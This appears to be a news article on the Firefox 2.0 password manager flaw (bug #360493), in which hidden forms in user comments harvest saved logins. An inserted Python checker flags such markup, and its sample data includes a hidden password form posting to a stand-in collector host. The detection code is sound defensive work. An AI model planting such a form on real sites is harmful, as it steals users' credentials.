Firefox Password Manager bug in Firefox 2.0

The Mozilla Foundation, which maintains code for the Firefox browser, has acknowledged that there is a problem with the Firefox Password Manager and has named it bug #360493. Microsoft has also admitted that the newly discovered password bug can affect Internet Explorer as well, but most reports indicate that Firefox is the more likely target because of the way it stores usernames and passwords.

Mozilla’s Firefox 2.0 has long been considered a safer Web browser than Microsoft’s Internet Explorer, but a new flaw in the Firefox Password Manager, which lets users store usernames and passwords for trusted Web sites, could let hackers steal their login data.

The problem, known as a reverse cross-site request, or RCSR, was first discovered by Robert Chapin, a Microsoft Certified Systems Engineer (MCSE) and I.T. consultant. The RCSR appears on blogs, message boards, or group forums that let users add comments with embedded HTML code.

On sites that allow users to enter code, a hacker can embed a form that tricks the user’s browser into sending its username and password information to the hacker’s computer. Because the form is embedded on a trusted Web site, the browser’s built-in antiphishing protection, which is designed to alert users to fraudulent Web sites, does not detect the problem.

Even worse, hackers can make the deceptive form invisible, meaning users can transmit their private data without even knowing it.
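A site that accepts HTML in comments can screen each submission for the markup described above before publishing it. The Python check below is an added example, not code from this article, Mozilla or Microsoft; the host names, the sample comments and the names `FormAudit` and `audit_comment` are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

HIDING = ("display:none", "visibility:hidden")


class FormAudit(HTMLParser):
    """Record form-related markup found in one user-submitted HTML fragment."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.site_host = urlparse(page_url).hostname
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("form", "input"):
            return
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.findings.append("form element in user content")
            # Resolve relative and scheme-relative actions against the page URL.
            host = urlparse(urljoin(self.page_url, a.get("action", ""))).hostname
            if host != self.site_host:
                self.findings.append(f"form posts off-site to {host}")
        elif a.get("type", "").lower() == "password":
            self.findings.append("password input in user content")
        style = a.get("style", "").replace(" ", "").lower()
        if any(h in style for h in HIDING):
            self.findings.append(f"hidden <{tag}>")


def audit_comment(html, page_url):
    """Return a list of findings; an empty list means no form markup was seen."""
    parser = FormAudit(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample data (not from the article).
PAGE = "https://forum.example/thread/1"
BENIGN = '<p>Great write-up, see <a href="https://docs.example/">the docs</a>.</p>'
SUSPICIOUS = ('<p>Nice post!</p><form action="https://collector.example/c" '
              'style="display: none"><input type="text" name="user">'
              '<input type="password" name="pass"></form>')

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, audit_comment(body, PAGE))
```

A site would hold back or strip any comment whose findings list is not empty; an allow-list sanitizer that drops `form` and `input` tags from user content altogether is the stronger control.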

Bug #360493

The Mozilla Foundation, which maintains code for the Firefox browser, has acknowledged the problem and named it bug #360493. Microsoft has also admitted that RCSR attacks can affect Internet Explorer, but most reports indicate that Firefox is the more likely target because of the way it stores usernames and passwords.

Neither Mozilla nor Microsoft has released a patch for the problem, but users can avoid RCSR attacks simply by disabling their browsers’ autosave features for usernames and passwords. In Firefox, the feature is found in the “Options” window under the “Tools” menu.

Mozilla has indicated that it plans a fix in Firefox version 2.0.0.1 or 2.0.0.2.

Battle of the Titans

Most experts agree that Firefox is by and large the safer of the two major Web browsers, largely because Microsoft, on account of its size, draws more attention from hackers.

Indeed, the last two years have seen monthly and sometimes weekly reports of new bugs in Internet Explorer, letting hackers do everything from hijack a user’s computer to corrupt its private data.

But Microsoft released a new version of IE — version 7.0 — in October, and Mozilla quickly followed suit with version 2.0 of Firefox. Both versions boast enhanced security, including antiphishing features that check Web sites against an online database of known frauds. And Internet Explorer 7 also offers much-requested improvements to the interface, such as tabbed browsing.
